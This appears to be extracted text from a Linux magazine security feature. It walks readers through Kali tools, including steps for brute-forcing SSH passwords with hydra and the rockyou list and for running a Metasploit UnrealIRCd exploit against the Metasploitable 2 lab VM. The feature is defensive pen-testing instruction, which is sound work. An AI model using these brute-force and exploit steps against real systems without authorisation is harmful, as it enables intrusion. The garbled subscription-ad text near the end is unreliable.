build with MODVERSIONS support. This is a feature that allows the kernel to automatically determine the interfaces used by a driver and (at a broad level) whether they remain compatible with those provided by the currently running kernel. This feature is often used in the commercial Linux distributions, which use this to provide limited support for third-party drivers, or updates that didn’t ship with the OS. A recent change to the upstream Linux kernel intending to allow the use of EXPORT_SYMBOL (a macro used to make kernel functions available across the kernel) within assembly code broke kernel module versioning due to a problem with the assembler (binutils) used in compiling the Linux kernel. A workaround was merged for 4.9 but it lead to a debate in which Linus said, “Some day I really do want to remove MODVERSIONS entirely. Sadly, today does not appear to be that day.” It will be interesting to see what, if anything, directly replaces the functionality required to use third-party (even open source) drivers if that day does come. 17 Feature Lock down your system Download and use some of the most popular security tools and distros to probe and secure your network within minutes 18 THE CIA TRIAD Confidentiality When discussing InfoSec, it is a given that private data should be just that. Confidentiality encompasses obvious steps to keep data safe such as storing it offline, encryption and use of 2FA (two-factor authentication). Confidentiality also pertains to people. Anyone with access to sensitive data should be trained to avoid security risks by choosing strong passwords, being aware of getting hacked themselves through social engineering, and having clear privacy guidelines to follow. Integrity H ardening. Penetration. Remote exploits. Least privilege. The number of buzzwords and terms related to InfoSec (information security) is almost as great as the various tools out there, each of which boasts that it’ll analyse your network for any potential threat and/or secure it against hackers. In this guide, we will examine some of the network security community’s favourite tools as well as detail the specific threats they address. One of the central tenets of network security is to reduce your ‘attack surface’ through removing unnecessary software. For this reason, any tools listed here should be run from within a pen-testing distribution of Linux, such as Kali, wherever possible. Before proceeding, make sure you have followed other basic InfoSec best practices, too. Do your network devices have any preinstalled accounts with default passwords that a hacker could exploit? Do the accounts you have installed all require admin privileges to make systemwide changes? Finally, make sure you are aware where your server’s log files are located. Usually they can be found in /var/log. These can be invaluable when simulating an attack on your network. One of the central tenets of network security is to reduce your ‘attack surface’ through removing unnecessary software Integrity involves ensuring data is consistent and accurate, both when stored and transmitted. Simpler ways of ensuring this involve setting file permissions and user access controls. More advanced methods may involve use of cryptographic checksums such as MD5 to produce a hash value of a new document to compare to the previous copy. Integrity also encompasses running and maintaining backups of all important data. This is crucial to protect against data loss caused by factors other than unscrupulous hackers, such as a server crashing due to an update or a hardware fault. Availability Availability focuses on making sure that data is accessible at all times regardless of outside influences like hacking or natural disasters. This may involve using RAID drives to make sure there are several copies, or storing backups on a separate site to make them easier to restore. Availability is better ensured by keeping all software up to date, as well as making sure hardware repairs are carried out rapidly. For data stored on servers, availability also involves providing enough bandwidth to all users to avoid slowdown caused by bottlenecks. 19 Feature Lock down your system PEN-TEST YOUR NETWORK WITH KALI LINUX The ultimate Swiss Army knife of ethical hackers The most popular pen-testing distro by far is Kali Linux, the full version of which is available on the cover DVD. When booting, choose the live mode of Kali for now. The default username is root, and its password is toor. On first boot you will also be asked if you want to use the default configuration (four desktops) or just one. Choose accordingly to load the desktop. Click the Applications menu to find that the tools have been neatly categorised for you. For instance, the awesome network tool nmap can be found under Information Gathering. Do not be alarmed if the same tool is listed twice under separate categories. By way of example, nmap is listed both under Information Gathering and Vulnerability Analysis, as it’s useful for both. As time goes on, you may wish to install additional tools and customise the Kali desktop to your liking. If this is the case, consider installing Kali to a USB stick with persistence. This option is available from the Boot Screen. If you only have access to your target device, consider running Kali in a virtual machine or even installing to an inexpensive Raspberry Pi computer in order to keep it separate from your personal data. Visit for virtual disk and ‘armhf’ images. Once installed, follow the developers’ instructions on how to tweak the Kali desktop as well as how to upgrade at. Many of the tools you will explore in Kali do not have a GUI. Nevertheless they are simple to use and by default Kali will load the man page of each one to show you all available commands. Although Linux systems cannot be affected by Windows malware, by default they will happily forward on malicious files via internet or USB to more vulnerable machines 20 WATCH LIVE TRAFFIC AND DATA WITH WIRESHARK The definitive network protocol analyser Wireshark is one of the best-known network analysis tools. It is capable of analysing live traffic as well as data captured to the disk. Wireshark can be launched from the Sniffing and Spoofing category in the Applications menu in Kali Linux. Wireshark has many uses. Chief among these is, should malware make it onto your network, you will be able to analyse malicious files as they enter and also find what data (if any) was successfully stolen. At first the display can seem very garbled, as it will show all data packets. Click the filter bar at the top to pare this down. To start, enter http.request.full_uri to see HTTP requests. Filter displays can be daisychained; for example: http.request.full_uri || ssl.handshake.certificate || dns If you regularly use the same search criteria, go to the Analyze>Filter Display Macros menu to set up a shortcut. For a full list of display filters, visit. Right-click any packets of interest and choose Follow>TCP stream to find out more. Go to File>Save As to choose which packets to save and in what format. These can be opened later in Wireshark and other tools such as Kismet (featured later) for analysis. The full user guide for Wireshark is available as a PDF from: user-guide-a4.pdf PREVENT MALWARE FORWARDING WITH CLAMAV Check individual files or multiple emails with this powerful antivirus scanner Although Linux systems cannot be affected by Windows malware, by default they will happily forward on malicious files via internet or USB to more vulnerable machines. ClamAV is an excellent FOSS (free and open source software) antivirus software toolkit. Its database is updated once every few hours and its detection rate beats that of many commercial scanners. In Kali, run: apt-get install clamav clamav-update clamdscan clamav-daemon …to install the necessary files. You can use the command freshclam to update the virus database manually, but it’s far better to schedule this as a cron job. Run the command: clamdscan -i <filename> …to scan individual files or folders. The ClamAV daemon will launch automatically once installed, but is not a real-time scanner in that it will not check files as they are written. The application ClamFS, however, can be used to automate checks of folders such as Downloads. Visit clamfs.sourceforge.net for more information. ClamAV is most commonly used on mail servers running PostFix to prevent the sending of malware and phishing emails through installing the additional program ClamSMTP. After installation, the ClamAV .conf files need to be updated to reflect the ports used by PostFix. This is to make sure all mail is scanned. Visit the developer page at thewalter.net/stef/software/clamsmtp for full instructions. 21 Feature Lock down your system STAY BEHIND UFW Protect your ports with a few quick commands Ufw (Uncomplicated Firewall) and its graphical companion Gufw serve as front-ends for the iptables firewall that is standard in most distributions of Linux. Run the following command: apt-get install ufw gufw …in Kali to explore further. Gufw is self-explanatory and comes with a switch to enable the firewall, and wizards to block or allow certain ports. There are even preset configurations to allow certain applications and games such as Call of Duty. The command-line version is almost as easy to use. Run: ufw enable Then to check firewall status, run: ufw status verbose By default, all outgoing connections are enabled and all incoming are disabled. You can enable connections with a single command citing the port and protocol. For example, if running a Minecraft server, allow incoming TCP traffic with: ufw allow 25565/tcp Services such as SSH follow the following syntax: ufw allow ssh To disable ports or services, replace ‘allow’ with ‘deny’. Ufw comes pre-installed on Ubuntu and certain other Debian-based distros, but is not ideal for RPM-based ones. For a true cross-platform solution, consider running a dedicated firewall distro such as IPFire (featured later). Sparta will ask you to specify a range of IP addresses to scan. Once the scan is complete, Sparta will identify any machines, as well as any open ports or running services ANALYSE APPS WITH BURP SUITE Lock down your web applications Burp Suite is an integrated platform for analysing and attacking web applications. The free version, which comes pre-installed in Kali, is likely to meet most admins’ needs. Burp Suite contains an intercepting proxy, which will run on startup on port 8080. This allows you to shunt any browser traffic through it for analysis. Make a request in your web app for the proxy to intercept it. Head over to the Target tab if you wish to view a site map. 22 From inside the Target tab, find your web application and then right-click one of your nodes. Select the ‘spider from here’ option to make sure there are no links to sensitive resources like databases that hackers might be able to exploit. Back in the Proxy tab, click the Action button, then Send to Intruder to pass intercepted traffic to Burp Suite Intruder. This allows you to automate an attack against one of your web applications, such as trying to brute-force a user’s password. Click the Intruder tab and then Positions to configure the request template as well as the attack type. The Payloads tab allows you to choose specific payload sets. Click the Start Attack button when ready. For a complete rundown of all Burp Suite’s features, visit the Developer’s support site at portswigger.net/burp/help. TEST YOUR NETWORK WITH SPARTA A handy Python GUI for nmap and hydra – this is Sparta Sparta, which comes pre-installed in Kali, serves as a front-end for the awesome nmap and Nkito tools among others, making network enumeration much easier. Upon launch, Sparta will ask you to specify a range of IP addresses to scan. Once the scan is complete, Sparta will identify any machines, as well as any open ports or running services. Where possible, it will also list the OS in the Information tab. If ports 80 or 443 are open, Sparta will also have Nkito run a scan. Nkito essentially checks server software to make sure it’s up to date, as well as ensuring that there are no potentially harmful files or programs. Use the Nkito tab to view the results and the Notes tab to record your progress. Sparta also incorporates the ‘hydra’ tool, which can be used to brute-force remote authentication services such as SSH. Besides specifying the IP, port and service of the remote host, you’ll need to link to a password list. Kali includes the ‘rockyou’ list containing thousands of the most commonly used passwords. If you want to test Sparta safely, consider using the Metasploitable virtual machine (featured later), which intentionally includes vulnerabilities. 01 Add hosts 03 05 Prepare your brute-force attack 02 Gather host information 06 Launch the brute-force attack Launch Sparta in Kali by going to Applications>02 Vulnerability Analysis>Sparta. When the window launches, select ‘Click here to add host(s) to scope’. A pop-up will appear asking you to specify an IP range. You can add a single IP address if you already know the host you wish to scan or specify an entire subnet, for example 192.168.1.0/24. Click Add to Scope to begin the scan. If you’re checking several hosts, right-click each as you go and select Mark as Checked to omit them from future scans. Hosts are listed in the left-hand pane. Click on each to see open ports in the Services tab. The layout is very clear. Numbered ports are listed under Port and the type of service in question such as SSH or FTP is listed under ‘name’. Use the Information tab to see the total number of open ports. Sparta also uses OS Fingerprinting to determine the host’s operating system, but this is not always accurate. Use the Notes tab at this stage to record any observations you’ve made so far. Check Nkito scan This step is optional but recommended. Nkito will automatically scan ports 80 or 443 if it finds them open. Click on the Nkito tab to see the results of the scan. The results can be quite convoluted so it pays to break them down by section. The ‘SSL info’ section in the screenshot, for instance, shows that the default HTTPS certificate used in devices running Broadcom firmware is installed. This certificate is installed on over 480,000 devices so needs to be updated. Other alerts such as ‘No CGI Directories found’ are more self-explanatory. Some may be prefixed with OSVDB- followed by a number. These are Open Source Vulnerability Database designations. Search osvdb.org for further information on individual vulnerabilities. 04 Select service to brute-force If you wish to test the strength of passwords on a remote host, click on the Services tab and then right-click on the name of the service you wish to attack, such as SSH. Click ‘Send to Brute’ to specify the IP, port and service you wish to crack. Next, click on the Brute tab and check these are correct. Once you have clicked on the Brute tab, examine the default options. These are checked so hydra will look for obvious vulnerabilities such as a blank password or a password that’s identical to a username. Below this, you can specify a username and/or password manually or choose from a list. Click the Browse button to view the /usr/share/wordlists folder. Extract rockyou.txt.gz to try some of the most common passwords. Alternatively, use the password list from John the Ripper located in /usr/share/john/password.lst or search for lists online. Click Run to begin brute-forcing the password of your chosen host. Pay careful attention to the warning message in the pane below. If you haven’t specified a username or password, this will display below. The Threads option at the top-right limits the number of parallel tasks hydra will try to carry out. If you are connecting via SSH, Sparta will warn you that servers usually support a maximum of four. Click Stop at any time to reconfigure before launching the attack again. 23 Feature Lock down your system USE THE METASPLOIT FRAMEWORK Test your server against thousands of exploits The free version of MetaSploit Framework (often shortened to ‘msf’) is bundled with Kali Linux. Msf is an open source framework for identifying vulnerabilities as well as developing and running exploit code. Kali also comes with the excellent program armitage, which serves as a GUI for msf. The commercial versions also have a web GUI, but when taking your first tentative steps with the framework, the command-line utility is less overwhelming. Rapid7, the developer of msf, has also created Metasploitable 2, a virtual machine which intentionally contains a number of vulnerabilities that can be exploited by msf, which you can use for the purposes of this tutorial. Kali has a built-in command-line tool, searchsploit, which can be accessed from within msf once a vulnerable port/service has been detected. For a more visually appealing, 01 categorised view, visit Offensive Security’s online exploit database:. Once the exploit has been loaded, you can configure it further with the command show options. The final step is to run the exploit to discover whether your server is vulnerable to this particular attack. Msf will inform you one way or the other and save the results to its database. Launch MetaSploit Framework Launch msf from within Kali by clicking Applications>Exploitation Tools>Metasploit. As with other security tools, you may find msf in more than one category as it can be used in various ways. If you are using the Metasploitable 2 virtual machine in Virtualbox, which is highly recommended, make sure to create a host-only network to which both the Kali and Metasploitable machine are connected. This will prevent either machine from connecting to the real network or the internet. Run the exploit to see if your server is vulnerable to this particular attack. Msf will inform you one way or another 24 02 Identify remote hosts This step simply involves identifying the remote host you wish to exploit through the use of nmap. If you wish, you can use Sparta’s GUI to do this. Alternatively, you can use nmap from the msf command line in the following format: nmap -v address For instance: nmap -v 192.168.56.102 If you wish to scan an entire subnet, use the ‘*’ wildcard. For example: nmap -v 192.168.0.* 03 Choose your exploit The nmap utility or Sparta will list all open ports on your remote host. The next step is to determine whether any of the services running on these ports is vulnerable to an exploit. The easiest way to do this from within msf is to use the searchsploit command. However, running searchsploit irc will show potential exploits for every version of every IRC program. You can narrow this down by scanning the specific port in question to determine the software version. For instance, if you want to 04 see if the IRC software running on port 6667 on host 192.168.56.102 is vulnerable, run the following command: nmap -A -p 6667 192.168.56.102 In Metasploitable 2, this shows more useful information. The machine is running v3.2.8.1 of the Unreal IRC daemon. Running searchsploit unreal irc shows there are two possible exploits for this version of Unreal on Linux. The paths are provided on the right. Move exploit Having identified the exploit you wish to use, it must be moved into Metasploit’s modules folder (~.msf4/modules). The easiest way to do this is to open a new Terminal and initially use the mkdir command to create a directory named exploits. Feel free to create subdirectories inside exploits to help organise them. For instance: cd .msf4/modules mkdir -p exploits/linux/remote 06 05 Load exploit Once msf has restarted or reloaded, load your exploit with the syntax: Configure parameters and run Once the exploit has been loaded, you can type show payloads and show options to configure the tool further. When typing the latter, you will be asked to ‘set RHOST’. This is where you specify the IP address of the remote host. For instance: use exploit/path/to/exploit set RHOST 192.168.56.102 Next, use the mv command to place the exploit where msf can see it. For example: mv /usr/share/exploitdb/platforms/ linux/remote/16922.rb .msf4/modules/ exploits/linux/remote/16922.rb Either restart msf or use the command reload_all to update. For instance, in the case of the IRC exploit listed previously, type: If you wish to choose a specific payload, use the same syntax: use exploit/linux/remote/16922 set PAYLOAD <payload> Note that there is no need to include the file extension. Exploits are written in various programming languages, but msf can recognise these automatically. Finally, run your exploit with the command: exploit 25 Feature Lock down your system ASSESS NETWORK DEVICES WITH KISMET A handy utility to detect rogue wireless access points passively Unsecured wireless access points as well as ad-hoc networks can cause interference with legitimate Wi-Fi areas. They are also potentially an easy way to access passwords and other sensitive data on devices that have not been properly locked down. Kismet, which comes pre-installed in Kali, is a wireless network detector built along similar lines to Netstumbler for Windows. One important difference is that it scans passively, so can discover hidden Wi-Fi networks. While it is commonly used for ‘wardriving’, it is also an enormously useful tool for security admins to make sure no unauthorised devices in your organisation are set up as an access point. Ideally Kismet needs a dedicated Wi-Fi card, which it will place into monitoring mode to detect Wi-Fi points nearby. This will allow your device to stay connected to the internet while Kismet is working. Kismet supports GPS devices. By default the program can be configured to show your device’s current location, but through use of add-ons it can also plot the likely location of other Wi-Fi networks on maps, making it easier to trace their exact location. KISMET MENUS The Kismet menu allows you to view the Kismet console or add a new interface for scanning. Use the Sort menu to change how networks are displayed NETWORK AND CLIENT LIST The Network List displays any wireless networks in range. Hidden networks are listed as ‘<Hidden SSID>’. Clients’ MAC addresses are listed below. Use arrow keys to scroll up and down GENERAL INFO Here Kismet displays information such as detection of new networks and when log files have been displayed. The current wireless interface is also shown at the bottom-right 02 Configure startup options On the first run, Kismet will ask you to choose your text colour. Click Next to automatically start Kismet Server. The Startup Options window will appear, where you can configure any startup parameters such as logging. By default, logs are saved to your home folder. Click Start when you are ready to continue. 04 Set up GPS This step is optional but highly recommended for hunting down rogue Wi-Fi networks. You will need an external GPS device to be connected to your device. In Kali, run: sudo apt-get install gpsd gpsd-clients 01 Install and launch Kismet If you are using Kali, Kismet is preinstalled and can be launched from the Terminal with the command kismet -l. Otherwise download it from your local repository. Kismet requires root privileges to perform some functions. This carries a risk of bugs or exploits damaging your system. In Kali, where you work as root by default, this shouldn’t be an issue as it is designed with security in mind. For other distributions, consider installing Kismet with the setuid set, which grants root privileges only to those processes that need them. 26 03 Add a source Next you will see a message stating that Kismet started with no sources defined. Click Yes to choose to add a source now. The ‘add source’ window will now appear. Use the command ip link show or ifconfig in the Kali Terminal to display the names of your network interfaces (such as ‘wlan0’) and enter it here. You can also set a name if you wish. Click ‘Add’ when you are done. Kismet will launch and immediately begin to list networks and clients. …to install the necessary software. Next, connect the GPS dongle and run dmesg | tail -n 5 to determine where it is mounted, such as dev/ttyUSB0. Start the GPS device with: gpsd <device location>. For instance: gpsd /dev/ttyUSB0 Finally, edit etc/kismet/kismet.conf and uncomment both the lines ‘gpstype=serial’ and ‘gpsdevice=/dev/rfcomm0’ by removing the hash (#) at the start. Amend ‘/dev/rfcomm0’ to the actual location of your GPS device. Restart Kismet to see your current GPS co-ordinates. TEST WITH METASPLOITABLE 2 Practise pen-testing safely with a virtual machine Metasploitable is not an application but a virtual machine image based on Ubuntu Linux, which contains a number of intentional vulnerabilities. This can be used to safely test security tools such as Sparta and the MetaSploit Framework. The image itself can be downloaded from bit.ly/2h8FXgm (or from the cover disc). You will need virtual machine software such as VirtualBox (available from) to run it. The easiest and safest way to pen-test Metasploitable is to run Kali in a virtual machine. VirtualBox can create a hostonly network that will allow Kali and Metasploitable to see one another without being exposed to the rest of your network or the internet. First go to File>Preferences>Network>Host Only Network>Add to create a new network. Next, inside each virtual machine, click Settings>Network and choose Host Only Adapter in the drop-down ‘Attached To’ menu. The name should populate automatically with the host-only network you created. Under Advanced, set Promiscuous Mode to Allow All. The default username and password for the virtual machine is msfadmin. A full video tutorial showing how to set up Metasploitable 2 in VirtualBox is available on the Rapid7 website. Point your browser to: community.rapid7.com/thread/2007. The easiest and safest way to pen-test Metasploitable is to run Kali in a virtual machine STASH PASSWORDS WITH SYSPASS Secure passwords in a multi-user environment with an easy-to-manage database Syspass is a web password manager written in PHP. Its chief advantage is that it is very lightweight, using an HTML5 and AJAX interface. The database is protected by a master password, and individual user accounts and passcodes are encrypted with AES-256 CBC. SysPass will run on any server using Apache, PHP and MySQL, and is even designed to be run from a portable flash drive for extra security. Once installed, users log in to the interface with their own username and password, which is not shared with others. Any users in your organisation who previously used a personal password database with KeePass can easily migrate their accounts to SysPass. Multiple users can also be added to groups; for instance, all the administrators of a particular website can access the username and password to connect via FTP. The users that are ‘Application Admin’ or ‘Account Admin’ can view, modify and delete any account. They do this through use of a master password that is required each time global changes such as adding a new user are made. A demonstration of SysPass’s colourful and simple web interface is available from demo.syspass.org (use the default passwords shown). Setup instructions can be found at wiki.syspass.org/en/start. 27 Feature Lock down your system PROTECT NETWORKS WITH IPFIRE Quickly set up a highly customisable firewall for all your networks IPFire is an open source firewall Linux distribution. This is an oversimplification, however, as it offers a number of other features such as intrusion detection and support for OpenVPN. IPFire takes a serious approach to security through using an SPI (stateful packet inspection) firewall built on top of netfilter. The setup process allows you to configure your network into different security segments. Each segment is colour-coded. For instance, the green segment is a safe area representing all regular clients connected to the local wired network. The red segment represents the internet. No traffic can pass from red to any of the other segments unless specifically configured in the firewall. The default setup is for a device with two network cards with a red and green segment only. However, during the setup process you can also set up a blue segment for wireless and an orange one known as the ‘DMZ’ for any public servers. Once setup is complete, you can configure additional options and add-ons through an intuitive web interface. IPFire is specifically designed for people without large amounts of networking experience and can be deployed in minutes. No traffic can pass from red to any of the other segments unless specifically configured in the firewall 01 Download and install IPFire ISO Visit in order to download the 162MB ISO of IPFire (or get it from the cover disc). The default hardware requirements are very minimal. Click on Other Download Options to obtain flash images as well as versions compiled for ARM architectures. The IPFire site cautions that the software doesn’t run well on devices like the Raspberry Pi, nor does it make use of the hardware random number generator. Consider having a dedicated server for IPFire or running it inside a virtual machine. 28 02 Run IPFire setup The initial setup process is very simple. Select your language and use the space bar to indicate you’ve accepted the terms of the GNU licence. You will then see a notification saying that the system has been installed. The device will restart, at which point you will be asked to select your time zone. Next, you will be asked to select a root password to access the IPFire command line, as well as an admin password for accessing the web interface later on. 03 Choose network configuration type Having chosen a host name and local domain settings, you will be taken to the Network Configuration menu. As outlined previously, the default settings are ‘GREEN + RED’. These represent devices with Ethernet attached. If you wish to set up wireless (blue) or a public server (orange-DMZ), select the ‘Network Configuration type’ option, then use the arrow keys to select a different setup. You can change these options post-install but as IPFire cautions, a network restart is required, as well as reassignment of drivers (see Step 4). 04 Choose driver assignments Next, in the Network Configuration menu, choose Drivers and Card Assignments. You will now see the Extended Network menu. Select Green in the first instance. The menu will ask you to choose the network card for this interface. If you are unsure which to choose, click Identify and the lights on the port in question will flash for ten seconds. 05 Set network addresses Select Address Settings from within the Network Configuration menu. You will then be asked to select the interface in question. Green allows you to assign any valid IP address for a private network here, for instance 192.168.0.1. There are more options for the Red interface, which may vary depending on your ISP. If you do choose to assign a static IP, assign it to a different subnet. For example, if green is 192.168.0.X, red could be 192.168.2.X. If you are unsure, choose DHCP. 06 Configure DNS and gateway Back in the Network Configuration menu, choose DNS and Gateway Settings. If you chose DHCP when configuring the Red interface, your ISP’s DNS servers will be used by default and you do not have to configure this further. If you chose a static IP or wish to use a different DNS server such as OpenDNS, enter them here, leaving the Gateway field blank for now. A full list of public DNS servers is available from: wiki.ipfire.org/en/dns/public-servers. 07 Configure DHCP server Click on Done on the Network Configuration menu to configure the DHCP server for the ‘Green’ interface. Use the space bar to enable, and then specify your desired range of addresses within the same subnet as your green interface. For instance, if the IP address of your green interface is 192.168.0.1, you could choose a range of 192.168.0.10 to 192.168.0.99. Note that the ‘Primary DNS’ address is the same as the IP address of your green interface. This is because IPFire uses a DNS proxy. Leave this as is for now. 08 Open web interface 09 Configure firewall Once setup is complete, IPFire will restart and load the firewall. You will see the IPFire Console. Log in as root with the password you previously chose if you wish, then run ifconfig to check that your interfaces are in order. You can access the web interface from any device connected to the network by opening your web browser and entering. As IPFire uses a self-signed certificate, you may need to confirm a security exception. Enter the username admin and the password you chose previously to display the web interface. The web interface is easy to follow. Take some time to work through it to use IPFire’s Intrusion Detection System or set up a VPN. For now, click Firewall>Firewall Rules>New Rule. The layout is fairly easy to follow. For instance, if you wish to force clients to block all external DNS servers to prevent DNS hijacking, select GREEN in the Standards Network menu to indicate you wish only to use IPFire’s DNS proxy. Chose RED in the same menu in the Destination section. Finally, under Protocol select DNS and make sure REJECT is highlighted. For a full rundown of the various configurations, consult IPFire’s firewall documentation at: wiki.ipfire.org/en/ configuration/firewall/start. 29 Feature Lock down your system STAY SECURE WITH GOOGLE AUTHENTICATOR Secure your SSH connections with minimal fuss through two-step verification For system administrators, connecting to servers via SSH is part of a daily routine for running updates and modifying files, but this can leave the system open to exploitation. While you can reduce the chance of this happening by following some SSH best practices such as disabling root log-on, changing the default SSH port and using long passwords, the previously mentioned tools (Sparta in particular) demonstrate how easily vulnerable ports can be scanned and how passwords can be brute-forced. Even using programs like fail2ban to limit unsuccessful login attempts or to ban certain IPs for a certain amount of time is no magic bullet, as many exploitation tools can perform several parallel tasks. The security of your SSH server can be hugely increased through Google Authenticator. This application uses twostep verification services based on a TOTP 01 (time-based one-time password) algorithm. The authenticator works in tandem with a mobile app, providing 6-8 digit one-time passwords that are required in addition to a username and password. Note that our guide assumes you are using OpenSSH server, which is the standard for almost all versions of Linux. Installation For Debian-based servers, run: apt-get install libpam-googleauthenticator libpam0g-dev …to try to install the authenticator and related software from the repositories. Red Hat, Fedora and CentOS users should run: yum install pam-devel googleauthenticator If Google Authenticator doesn’t exist in your distribution’s repositories, you can download and compile with the make command from github.com/google/google-authenticator. PAM (pluggable authentication module) must also be downloaded and compiled from github.com/google/google-authenticatorlibpam. Consider installing the ‘ntp’ daemon if you have not done so already to ensure the system time is correct, as the Authenticator uses timebased codes. 30 02 Generate private key To begin, run the google-authenticator command. Press ‘y’ to indicate you wish authentication tokens to be time-based. Next, the authenticator will display information about your secret key, along with a QR code which you can scan using the mobile app. You will also see emergency ‘scratch’ codes, which can be used to log in if you ever cannot access your mobile device. Write down this information in a safe place before continuing, then press ‘y’ to update your home folder. 03 Finalise Google Authenticator preferences The authenticator will next ask if you wish to disallow multiple uses of the same authentication token. As the authenticator states, selecting this makes man-in-the-middle attacks much harder. You can increase the 30-second period for which tokens are valid in the next step if you wish. Finally, if you do not already have any programs such as fail2ban installed to prevent brute-force attacks, consider pressing ‘y’ to enable rate limiting. This limits attackers to no more than three login attempts every 30 seconds. 08 04 Configure SSH to use Google Authenticator Open the /etc/ssh/sshd_config file in a text editor. Scroll down to find the line that reads ‘ChallengeResponseAuthentication no’ and change it to ‘ChallengeResponseAuthentication yes’. Save the file. Next, edit the file /etc/pam.d/sshd and add the following line at the very bottom: auth required pam_google_ authenticator.so You must now restart the SSH service to apply the new changes. Run /etc/init.d/sshd restart to do this. If your SSH server is not already running, use service sshd start. 06 Test login via SSH Once your mobile app has been set up, you will see time-based six-digit codes being generated. On a separate device, open Terminal and run ssh user@yourIP. If this is the first time you are connecting via SSH to the server, type ‘yes’ to verify the key fingerprint. You will be asked to type your password in the usual way. Next, the system will ask for your six-digit verification code. Enter this to log in to the server. Switch users and repeat these steps for any additional users who wish to log in via SSH. Require two-factor authentication for console login This step is optional but can be used to secure logins via the console on the server itself. In your favourite text editor, simply open /etc/pam.d/ login and add the same line at the bottom as you did in the SSH configuration: auth required pam_google_ authenticator.so Bear in mind that if an attacker can physically access your machine, they may target the root account or install a hardware keylogger, so this will not be as effective as controlling physical access to the server in the first place. 09 Bypass two-step verification for the local network If you find it tiresome having to provide the verification code when connecting over the local network, configure Google Authenticator to ignore these addresses. Edit the file /etc/pam.d/sshd and replace the following line: 07 05 Set up mobile Authenticator app Using your smartphone or other portable device, visit the Google Play or iTunes Store and install either the official Google Authenticator app or one of its variants such as FreeOTP, which is maintained by Red Hat. The Google Authenticator app for Android is closed source, so from a security perspective FreeOTP is better. Either scan in the QR code generated earlier or manually add the ‘secret key’. The tokens are time-based. If you manually add the key in FreeOTP under the Provisioning section, simply enter user@IPaddress in the ID section. In Google Authenticator you would enter this under Account Name. Back up your private keys Although you have written down your private keys and scratch codes in a safe place, for peace of mind, consider using the ‘cp’ command to copy your Google Authenticator file in ~/.google_authenticator to a secure medium. For security reasons, Google Authenticator has no way of regenerating the QR code with your private key after it is run for the first time. Install the program ‘qrencode’ to generate a picture you can open on another device. Once installed, the image can be created with the following command: auth required pam_google_authenticator. so with this: auth [success=1 default=ignore] pam_ access.so accessfile=/etc/security/access. conf auth required pam_google_authenticator. so nullok Next, edit /etc/security/access.conf and add the following lines: qrencode -o qrcode.png 'otpauth:// totp/ACME:john.doe@email.com?secret=HXD MVJECJJWSRB3HWIZR4IFUGFTMXBOZ&issuer=A CME&algorithm=SHA1&digits=6&period=30' # Two-factor can be skipped on local network + : ALL : 192.168.0.1/24 + : ALL : LOCAL - : ALL : ALL Replace ‘ACME’, ‘john.doe@email.com’ and the secret key with your own data. Replace ‘192.168.0.1/24’ with your desired range of IP addresses. 31 ENJOY MORE OF YOUR FAVOURITE LIN SUBSCRIBE* & SAVE UP TO 37% OPENWRT: TURN YOUR PI OT R ROisB sue OidRe E L P arts this X st E N gu A plete 4-part BU1ILofD the com er.co.uk k INTO A ROUTER us Part THE ESSENTIAL MA GAZINE FOR THE GNU GEN ERATION MAKE WITH ITY KIT SECUR VD OTING D KERS HE HAC BEAT T LIVE-BO E SECURM tion Penetraw ith testing rry Pi Raspbe Y O UR SYSTE r Pi into the Turn you security tool ultimate new Compilee ar out softwFOS S with ed ms you ne ll progra ap ur tkitPC ark • nm The 7 fu ck down yo • Wiresh to lo enSSH • Snort • chkroo Get newg your distro updatin 24 of pages y Pi ux • • Kali Lin ntrol Take coBa ofto usesh shell e Learn how save tim scripts to rk best netwo What’s the vacy needs? for your pri insilainde Also ed e ure fram OUTE2 exp » IPR a Ras Pi pict functions » Maketo work with Go » How Black k3r HATfroHmac your Pi and Get more with this add-on HATs 17/06/2016 09:59 ISSUE 167 LUD 167 ital.indd Cover_Dig Learn Go Discover how to work with composite data including arrays, slices types , maps, pointers and structures file systems like a 001_LUD166_DIGITA pro L.indd 1 1 how to read, interpr et and adjust a Makefile accura tely LAUNC H PACK WITH Pi to detect and repor t movement Essential file syste admin revealed m How you can solve compilation problems Create, check and manage Learn UBUNTU 16.04 xuser.co.u k E MICROTH :BIT Program a motion sensor Get the Raspberry FREE N EW THE ES FOR TH SENTIAL MA E GNU GE GAZINE NERATIO HANDS-ON N Use a Pi Zero & a pHAT DAC to make your own music player err Raspb VP S micro:b it VER S RaspbSU erry Pi Build a web radio to visu Use the Piin Minecraft music IPFire • Op ing by buildvic a network de e s across r own storage Serve file ising you and optim Ns on test PLU 5 projects to con and animate LEDS and build a dice, trol torch and compas s ical Play mus ft Minecraalise Lock down yo online securitury INSTALL LIVE BO FROM THOT E FREE DIS C Get more from your password man agers Investigate netw sockets with ss ork Learn to prograhow m in 16. 4 Recove a failed r data from disk Resc ious with Kno ppix ue 18/05/201 17:36 files 6 your prec Code Ro Scissors, ck, Paper, Learn how Lizard, Spock to recreate game on 001_LU the Sens a e HAT classic D165W eek5_D igital.in dd 1 1OF6 RA PAGES I TUTORIASP LS LAUNCH PACK Go Start codi open sourng in Google’s ce language Find out what proces ses are bound to your ports Ubuntu UPDATE ESSENTIA L SOFTWA PACKAGRE ES • Ubun • Deskttu 16.04 Final • 64-bit op & Server edBeta and 32-bi itions t versions GET UB AC SSUNTU OF YORO L UR DEAL VICES Edit vid eo in OpenS Improve hot 2.0 movies your home in minu tes Power applica up CoreOS Debug virtual mawith a Clone yourchine to simp system lify testi ng Ne sensor tworked displays Display anot live data her Rasp from berry Pi Take adva tions etcd and ntage of fleet systemd , ISSUE 165 20/04/2 016 12:29 *US Subscribers save up to 40% off the single issue price. See more at: UX MAGAZINE FOR LESS WHEN YOU SUBSCRIBE! Every issue packed with… Programming guides from Linux experts Breaking news from enterprise vendors Creative Raspberry Pi projects and advice Best Linux distros and hardware reviewed Why you should subscribe... Save up to 37 % off the single issue price Immediate delivery to your device Never miss an issue Available across a wide range of digital devices Download to your device now Tutorial Tam Hanna started to develop a strange liking for fancy-looking diagrams when he cobbled together a primitive digital phosphor-like persistence feature for a DS-6612 oscilloscope. Ever since, he has tried to find ways to make information more accessible. Bash masterclass Bash masterclass Combine shell scripts and charts Transform your textual information to attractive diagrams using the awesome power of gnuplot Resources Bash gnu.org/software/ bash/bash.html gnuplot. gnuplot.info/ Tutorial files available: filesilo.co.uk 34 Tim van Beveren's research into air safety incidents raised a deeply uncomfortable fact: humans are less suited to processing text and perform much better when provided with graphical input. This is especially important when aircraft systems display information as series of numbers that are not coloured or marked up with additional visual information like an underlying bar chart. Even though the average system script – process computers will not be discussed in this tutorial – is not as critical as a wrong decision by a pilot, providing users with large blocks of text is not 